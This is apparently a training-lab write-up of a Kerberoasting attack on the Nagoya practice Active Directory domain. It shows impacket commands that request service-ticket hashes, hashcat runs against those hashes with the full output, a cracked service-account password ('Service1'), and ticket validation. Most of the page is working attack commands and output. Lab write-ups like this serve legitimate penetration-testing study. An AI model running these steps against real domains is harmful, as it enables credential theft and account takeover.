Kerberoasting

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache impacket-GetUserSPNs NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -k -no-pass -dc-ip $IP -dc-host nagoya.nagoya-industries.com
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
ServicePrincipalName                Name          MemberOf                                          PasswordLastSet             LastLogon                   Delegation 
----------------------------------  ------------  ------------------------------------------------  --------------------------  --------------------------  ----------
http/nagoya.nagoya-industries.com   svc_helpdesk  CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com  2023-04-30 09:31:06.190955  <never>                                
MSSQL/nagoya.nagoya-industries.com  svc_mssql                                                       2023-04-30 09:45:33.288595  2024-08-02 04:59:53.706593

During the BloodHound enumeration, 2 service accounts have been identified to be kerberoast-able.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache impacket-GetUserSPNs NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -k -no-pass -dc-ip $IP -dc-host nagoya.nagoya-industries.com -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
ServicePrincipalName                Name          MemberOf                                          PasswordLastSet             LastLogon                   Delegation 
----------------------------------  ------------  ------------------------------------------------  --------------------------  --------------------------  ----------
http/nagoya.nagoya-industries.com   svc_helpdesk  CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com  2023-04-30 09:31:06.190955  <never>                                
MSSQL/nagoya.nagoya-industries.com  svc_mssql                                                       2023-04-30 09:45:33.288595  2024-08-02 04:59:53.706593             
 
 
 
$krb5tgs$23$*svc_helpdesk$NAGOYA-INDUSTRIES.COM$NAGOYA-INDUSTRIES.COM/svc_helpdesk*$f2c436ebdce26127c56f7249c727a15f$f3d642948a6419c809e354aefee2bc327d1bacffd058ebd02f786ef31893e68070eefea0a0a3b3bfa8a5db917c4c166c81892649208b9d5c671dbd30d41d48a16c151e99e0eaf0cdacc6a971ac9f2dbfa63269a70c74fc618497cd2d0080d56288708ca1ea1881ba1803dbe8addd35a06a2be09a24bbeea645683624b0238ac4777c4226d669c421a9b30062d1c570aad24e25c9836e4f5e42f7a399679f0d19293322dbcaee864046e56abd4814f3d7466fb4253edb146fc680e0aa274a19d3a93e22ac30b388e9223fe213a0011afb7d562608766f4fed762251899ade55ec3b326520c2d8675a85bfdb3c29f2651c46aeff293410fbde7f76787f4893004b69470c565f3d65909fbebc0662a779fb16933fbd314144eb3e2b293b2ea4bde3e63983c6d495b2d27b843e15c98a928c261dd4a89a54c9ac79f38e50b47150e4531f2861b7832c54df72e9bf4417355caf66d64deebf691297f5d1fae0aceac5cca0d17e5b12c13c0c41b28a8d0bf74fe831f553b21df9c2527ef049ec179f3aa3f839e762e13a5173ecd5613f3b2fc9d69096d1f61a702a5e1c1b76f2f3f050c67bce7ecf96fb77a48a424a6fbddd260992b032e756905bc1964bfb63886988f4e6092210939c882a7b83ded3e54550470cdb13d5e6b5b98cd1d8e4947edb62a005189d856f338bf8fa1ee9589ae21182ad26170abcd2b450701de401c6256595d0a11e3cc0510ab07a7524ac5d8dac89f15e0210779515b5bd657b3a4a6c1ecae6afbafd92222e58622b078c233b860ba19c8865681b1b8c363ba9e039f483b1d1b25397a4520f30858e2d5ffd510e8aba19fab27cdac810ec23f750afb5ba43c9685a81aee791769f43616e418e4bee1060bd08975224b5ee1c056233a20d991e4707d59521adcb502b82a729b83ef71e5dbff925608ab8f52c80ed87f4f8b4e9ac11d1491798f764543b99b4dffbda25493d5ec6db1d29da5048f6c7023af2026e55d21a6e9a27817fcf30925fee2879d1b78014268571de635fd2df2b7c1e28a355c1d11c89b75e50c9b268015e4dc3eace346110908a3b817fec7223730e027ee60a583af73083618afe6e817f4485340d1c7275bc0e86aa9acd92c443f7edcc86ca7bb725e77fb2be54e84da60710347b184f5c49f94726ea1c68628bac86e2a236cb40a5f4080c8d91cddd7af5ad5eebd0ea195197673db8a2218ae7ee2875bb160f113fae5b6cd3767eff3c29482891610026b2cd9c75b4ca2d469ae14136d6811b343500877addf95e253eefa8a5babcd99308967144d7dcf1ca997dafe10fd4713ba2f752ff6f49903d0d74fc8ed4482a46d6c420134cd102edcb8196fdd25936e8780b757fcb3307a886d5a1822a6fd5847ef12cec6f58a10333e4117438fdc75ab6d11012ebb98439aab2e8d5698cdadb7a4c494db6e174aeb19e947819ef15d78b294f3fed44d049be75e57776526bfb961ff56bd7bdede17c9979e41f5e1d344d65dd7fd03081eb5ac026817d3544a492b9eda567854a34a708ac874146ce64441cfaf8086df8230e4fbd35da320818f073da74068a13341cbfac4b9e92e9cf75f5f0dc8d896f1c38a49b58a803fe08b6704daea90f901a8ac1efad53ab50a3adb4cc
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$NAGOYA-INDUSTRIES.COM/svc_mssql*$63ab1301fddf00f02521ba17adee2649$47242d50a38b28e6c73f2e1f0251a75bf22731121287943696df8663d80e291694470a97c62a96148a6b931c166b33cefebbc60e6eb4c7125d0c33b058a37e3360ebc9710035e2e7a318495dafee88020cddd9f46d9cae0403b18716ab17d4634e8113e0dab3b54bffad274db155b1c8ed7087daaba307bdda3d4cb75fd5f2af90c57e6c16ccab1bae88c9f927e3dcf4a19ba5b1316edb8eff3cdaabfddf42555fadc50e4cd972bcd0363b1cdd945e6221114ff5a054bc7b5b541b3771fc94d1692324e04f0f08b1be8b25499b7484e7bc29fd83d0e6624e8d21dfb3bf883d062609d8e678bfeaf6698c266ffd50581e923b286aa459273a38152715e47125d174359136c1454f9ababde816a68f00e730ff7a3d4ad41adc7e860cc6602a06d9c87cd8955f287e2187a42095bd99e81c0cf55cc79897bae7842dae2dd693426e636190b655488b3581278e251b9b8a8e793b50b293f711f591479ccf8f5ca49b9eda0a56f7df053b8128cc3b188279054a62409064c10825fb235bfc263b75ac8d8c6158c00f7697468bc7bb4426597a040c1557899ce960ac678965f73e6dfb25df3c16609ef6372ec1a4b01b420933782130ee9b920d439ae24be458222f1b4e2804ad8c0ce0c3aba50afcef23b1caa91c4ded2c89e4bd257edbbdcd2af4b2754818562a12e6760a36a42421c385f23928a1c665fbb180c697d911b9ecd8867dc4d13e65691a7be61faa358c83c7aaf67522f3ecafb9498c4cc4a61cc2fc42ebec57873ba2fa7cef7c6747132a99ce38bc7210a955bfe055bdf5b10b775f0d67d61c51c6da2cb5f844bde7cea58504b686f562cd8e813f95826cb18010869c309e5e4a5582511c12000b8f093a90a410f13c2f67b5538389a2479c1fa1ea080cf9157cc28e7d8f1c8e72e96cdbf23c83bbc912c7d979cd926dc402e74bd9d19975f86e4b38907cf1a87a796894efb9118ca6e4ec293baf964a3e7abc12f7b2efffd5d1227c881360cff26db063a10034c12d2feab74d5a5c063c6bcc3c92dddaa30a8782179d423bbae5cc60e1cfe2ca6b22b598d4775918f5e88ba83fd7aae9cf663224afeab8dd943314485b882d0601b1f04815c27cdf0233b1b72172c0eebddc85afa6d56aa201ffa64f298c0c12a7d4a2feaec2804734089af41a4452bf6575154368797bf78bc76cc116b6491555b3e06353c385031d31ac60e48ff7bdde5a62106ad54092ed64c01f6171b752f87f4b4b97745c9e9953d48ddd5df9db62d5b09c3c1f222cae44530c261b04e14bc3286b0e2801c2b0b9165413e79bdaa51a4605193fa9c16be9761e8ed5b51eafe5a0a970b750e31bdb534e7e393c22247a7b1bfed19ddb53e2d4df626788d4b56cb37bcbda64ca7fbbe80aed451184156ddf12b9632bfcb95d83ba3ae070be32e9df42038802e82be92c391561e68d158ca738dbddce3b6130c63f9a921de59712c6c63a7aa26b864edaefa7b140cd8654e5a974871f160f4db7bda666613b934985422132533dcc47b813617cbbc9f6a842fa2a916cb9f158bb26e28c4252ce4598b4a41d2cf0c14c367b9641cbf80433b57cc042b33bb90fa8b64c91eff3c717c849110b280dd2d06faad2cde9a649f38b15f35d735e2a

Retrieving TGS-REP hashes for both svc_helpdesk and svc_mssql accounts

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ hashcat -a 0 -m 13100 svc_helpdesk.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
Approaching final keyspace - workload adjusted.           
 
Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_helpdesk$NAGOYA-INDUSTRIES.COM$NAG...adb4cc
Time.Started.....: Wed Apr 23 19:13:39 2025 (4 secs)
Time.Estimated...: Wed Apr 23 19:13:43 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3860.8 kH/s (1.94ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[216361726f6c796e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 50%
 
Started: Wed Apr 23 19:13:38 2025
Stopped: Wed Apr 23 19:13:44 2025

hashcat was unable to crack the TGS-REP hash for the svc_helpdesk account

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ hashcat -a 0 -m 13100 svc_mssql.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$NAGOYA-INDUSTRIES.COM/svc_mssql*$63ab1301fddf00f02521ba17adee2649$47242d50a38b28e6c73f2e1f0251a75bf22731121287943696df8663d80e291694470a97c62a96148a6b931c166b33cefebbc60e6eb4c7125d0c33b058a37e3360ebc9710035e2e7a318495dafee88020cddd9f46d9cae0403b18716ab17d4634e8113e0dab3b54bffad274db155b1c8ed7087daaba307bdda3d4cb75fd5f2af90c57e6c16ccab1bae88c9f927e3dcf4a19ba5b1316edb8eff3cdaabfddf42555fadc50e4cd972bcd0363b1cdd945e6221114ff5a054bc7b5b541b3771fc94d1692324e04f0f08b1be8b25499b7484e7bc29fd83d0e6624e8d21dfb3bf883d062609d8e678bfeaf6698c266ffd50581e923b286aa459273a38152715e47125d174359136c1454f9ababde816a68f00e730ff7a3d4ad41adc7e860cc6602a06d9c87cd8955f287e2187a42095bd99e81c0cf55cc79897bae7842dae2dd693426e636190b655488b3581278e251b9b8a8e793b50b293f711f591479ccf8f5ca49b9eda0a56f7df053b8128cc3b188279054a62409064c10825fb235bfc263b75ac8d8c6158c00f7697468bc7bb4426597a040c1557899ce960ac678965f73e6dfb25df3c16609ef6372ec1a4b01b420933782130ee9b920d439ae24be458222f1b4e2804ad8c0ce0c3aba50afcef23b1caa91c4ded2c89e4bd257edbbdcd2af4b2754818562a12e6760a36a42421c385f23928a1c665fbb180c697d911b9ecd8867dc4d13e65691a7be61faa358c83c7aaf67522f3ecafb9498c4cc4a61cc2fc42ebec57873ba2fa7cef7c6747132a99ce38bc7210a955bfe055bdf5b10b775f0d67d61c51c6da2cb5f844bde7cea58504b686f562cd8e813f95826cb18010869c309e5e4a5582511c12000b8f093a90a410f13c2f67b5538389a2479c1fa1ea080cf9157cc28e7d8f1c8e72e96cdbf23c83bbc912c7d979cd926dc402e74bd9d19975f86e4b38907cf1a87a796894efb9118ca6e4ec293baf964a3e7abc12f7b2efffd5d1227c881360cff26db063a10034c12d2feab74d5a5c063c6bcc3c92dddaa30a8782179d423bbae5cc60e1cfe2ca6b22b598d4775918f5e88ba83fd7aae9cf663224afeab8dd943314485b882d0601b1f04815c27cdf0233b1b72172c0eebddc85afa6d56aa201ffa64f298c0c12a7d4a2feaec2804734089af41a4452bf6575154368797bf78bc76cc116b6491555b3e06353c385031d31ac60e48ff7bdde5a62106ad54092ed64c01f6171b752f87f4b4b97745c9e9953d48ddd5df9db62d5b09c3c1f222cae44530c261b04e14bc3286b0e2801c2b0b9165413e79bdaa51a4605193fa9c16be9761e8ed5b51eafe5a0a970b750e31bdb534e7e393c22247a7b1bfed19ddb53e2d4df626788d4b56cb37bcbda64ca7fbbe80aed451184156ddf12b9632bfcb95d83ba3ae070be32e9df42038802e82be92c391561e68d158ca738dbddce3b6130c63f9a921de59712c6c63a7aa26b864edaefa7b140cd8654e5a974871f160f4db7bda666613b934985422132533dcc47b813617cbbc9f6a842fa2a916cb9f158bb26e28c4252ce4598b4a41d2cf0c14c367b9641cbf80433b57cc042b33bb90fa8b64c91eff3c717c849110b280dd2d06faad2cde9a649f38b15f35d735e2a:Service1
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$NAGOYA...735e2a
Time.Started.....: Wed Apr 23 19:14:36 2025 (0 secs)
Time.Estimated...: Wed Apr 23 19:14:36 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3894.7 kH/s (1.86ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1044480/14344385 (7.28%)
Rejected.........: 0/1044480 (0.00%)
Restore.Point....: 1032192/14344385 (7.20%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: alexliam -> PORTTER
Hardware.Mon.#1..: Util: 20%
 
Started: Wed Apr 23 19:14:35 2025
Stopped: Wed Apr 23 19:14:38 2025

TGS-REP hash cracked for the svc_mssql account; Service1

Validation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/svc_mssql@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Service1
[*] Saving ticket in svc_mssql@nagoya.nagoya-industries.com.ccache

Validated TGT generated for the svc_mssql account

InfoSec LAB

Explorer

Nagoya_Kerberoasting

Kerberoasting

Password Cracking

Validation

Interactive Graph View

Table of Contents

Backlinks